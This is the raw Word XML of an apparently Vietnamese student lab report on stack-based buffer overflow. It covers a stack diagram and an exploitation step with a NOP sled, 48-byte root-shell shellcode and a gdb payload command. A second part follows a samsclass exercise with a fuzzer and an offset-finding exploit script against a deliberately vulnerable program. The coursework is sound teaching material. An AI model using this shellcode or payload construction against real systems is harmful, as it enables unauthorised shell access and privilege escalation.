        </w:rPr>
        <w:t xml:space="preserve"> trên stack: địa chỉ bắt đầu 0x7ffffffde58, địa chỉ kết thúc 0x7ffffffffdeb8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED079C8" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidSect="00AF301F">
          <w:headerReference w:type="default" r:id="rId20"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1701" w:left="1134" w:header="0" w:footer="0" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sect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hidden="0" allowOverlap="1" wp14:anchorId="2F6F99FF" wp14:editId="6773A77F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1567180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>139700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2094865" cy="2308225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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30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DCB105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7FCB9B" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3940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Kernel space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B2DB64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75C41" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3580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argc, argv[], env variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BAE3AE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BD81A6" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="36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rip (return address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E238550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BE16E4" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="36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rbp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8117F2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808710" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="36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alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CA5D15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61DA9A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0C15F9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B3A4A1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BFB703" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="4160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i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buf[100]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDCD81D" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA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1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="5AEDA780" wp14:editId="6A3FB6B5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2075815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>615950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1586230" cy="23431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34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5BAB34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C39520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3CBF0D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7A01B5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04821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FC0FDA" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="4380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rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8ED51" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA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br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B53570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CFCA94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9B4EC8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2A1F48" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="380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6 * 0x41 (D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FED1B8" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA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1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="29513C76" wp14:editId="2C893444">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-158749</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="173355" cy="203200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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C03B09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5B523" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="380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8 * 0x41 (C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F22FCFF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509117" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr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26A6CD6D" wp14:editId="68239554">
            <wp:extent cx="173355" cy="2032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B4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12 * 0x41 (B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DAD9A7" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA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1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="3824A357" wp14:editId="709B02B1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-634</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="173355" cy="1318895"/>
            <wp:effectExtent l="0" t="0" r="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31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DC9B49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DFB2A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D94436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1AB02C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E558AE" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1940"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidSect="00AF301F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1701" w:left="1134" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="4766" w:space="440"/>
            <w:col w:w="4766" w:space="0"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>100 * 0x41 (A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7287FD19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05ABE1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9FC410" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr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1.7 Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46314DD0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8300A6" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="358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52 chỉ thị NOP(No Operation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BCDA36" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000C37D7" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000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'\x90'*</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC6EE12" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA826DF" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="358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Shellcode (48 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E803B6" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556C8CD2" w14:textId="1E117F10" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000" w:rsidP="00C15F72">
      <w:pPr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'\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40633C5D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0FA117" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidSect="00AF301F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1701" w:left="1134" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lệnh khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3B904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D70C6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DC16BF" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="334" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine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4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run $(python2 -c "print '\x90'*</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 52</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + shellcode + 'B'*12 +'C'*8 + '&lt;Một địa chỉ bất kỳ ở vị trí 0 tới 76 của buffer (viết theo dạng little endian)&gt;'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46618DC7" w14:textId="7288308E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  <w:sectPr w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidSect="00AF301F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1701" w:left="1134" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2788F6D1" w14:textId="6E9BE472" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00C15F72" w:rsidP="00BB4DA8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F5ACC8" wp14:editId="66BF5E26">
            <wp:extent cx="5943600" cy="3244850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17948295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5D89" w14:textId="77777777" w:rsidR="00C15F72" w:rsidRPr="00BB4DA8" w:rsidRDefault="00C15F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FDECA4" w14:textId="441C7C33" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00C15F72" w:rsidP="00BB4DA8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A583D" wp14:editId="19EAFB82">
            <wp:extent cx="5943600" cy="3244850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17123282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BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C3661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A52AC8" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5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Câu 2: Khai thác lỗi Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4D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>với Listening Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17673012" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:line="275" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-14" w:hanging="10"/>
        <w:jc w:val="both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2.1. Tham khảo và thực hiện hướng dẫn khai thác lỗi Stack-based buffer overflow có listening shell ở link bên dưới. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA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Chụp hình minh hoạ chiếm được shell sau khi hoàn thành mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8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ED 203.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>trong hướng dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CABEE4A" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="14" w:line="267" w:lineRule="auto"/>
        <w:ind w:left="345" w:firstLine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color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">https://samsclass.info/127/proj/ED203.htm </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tải xuống và chạy chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE17F3A" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Trong cửa sổ Terminal, thực hiện các lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA8EBD" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1450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Wget -nv </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidRPr="00BB4DA8">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://samsclass.info/127/proj/ED3a.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76A2CB1D" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1450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Wget -nv https://samsclass.info/127/proj/ED3a</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8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</w:p>
    <w:p w14:paraId="5E570B4C" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1450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Chmod a+x ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5954E0" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1450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./ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19EF4B" w14:textId="76D2B8AC" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="0088200F">
      <w:pPr>
        <w:ind w:left="-2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4096A" wp14:editId="6D277CC2">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11469218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00F" w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFDC285" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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lastRenderedPageBreak/>
        <w:t>Xem mã nguồn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751C63F2" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:ind w:right="5938"/>
        <w:jc w:val="right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Thực hiện lệnh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>cat ED3a.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D333007" w14:textId="26059A85" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="0088200F">
      <w:pPr>
        <w:ind w:left="-2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F20C3" wp14:editId="7BCFC78E">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20609488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00F" w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC652CA" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Làm một Fuzzer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4662C57B" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="4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Trong cửa sổ Terminal, thực hiện lệnh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>nano fuzzer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4D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#!/usr/bin/python import sys length = int(sys.argv[1]) print 'A' * length </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563EDF11" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Thực thi các lệnh này để làm cho fuzzer có thể thực thi được và kiểm tra nó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chmod a+x fuzzer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450071C8" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="3610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./fuzzer 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D19E0FF" w14:textId="748BDF24" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="662"/>
        <w:ind w:left="567" w:right="-184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12C61" wp14:editId="6C044B75">
            <wp:extent cx="5943600" cy="3242310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10168739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5A39" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Thực hiện các lệnh này để kiểm tra chương trình với các đầu vào có độ dài 1000 và 1010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41671067" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="00BB4DA8">
      <w:pPr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>./ED3a $(./fuzzer 1000) ./ED3a $(./fuzzer 1010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED1523" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="397"/>
          <w:tab w:val="center" w:pos="3843"/>
        </w:tabs>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto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ab/>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Thực hiện các lệnh này để tải chương trình vào gdb và chạy nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0750B1C4" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="3610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Gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC05BB5" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="00BB4DA8">
      <w:pPr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>Run $(./fuzzer 1020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B0EBD" w14:textId="2111BCFB" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:ind w:left="567" w:right="-192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BBDA34" wp14:editId="362CB40E">
            <wp:extent cx="5943600" cy="3242310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16514532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3649" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto"/>
        <w:ind w:left="355" w:right="3735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-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Trong cửa sổ Terminal, thực hiện lệnh: nano ex1 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Nhập mã này: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C6F41" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="17"/>
        <w:ind w:left="730" w:right="109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#!/usr/bin/python prefix = 'A' * 1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E54D732" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="3610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pattern = 'BBBBCCCCDDDDEEEEFFFF' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D0770E" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="00BB4DA8">
      <w:pPr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print prefix + pattern </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373F80D" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
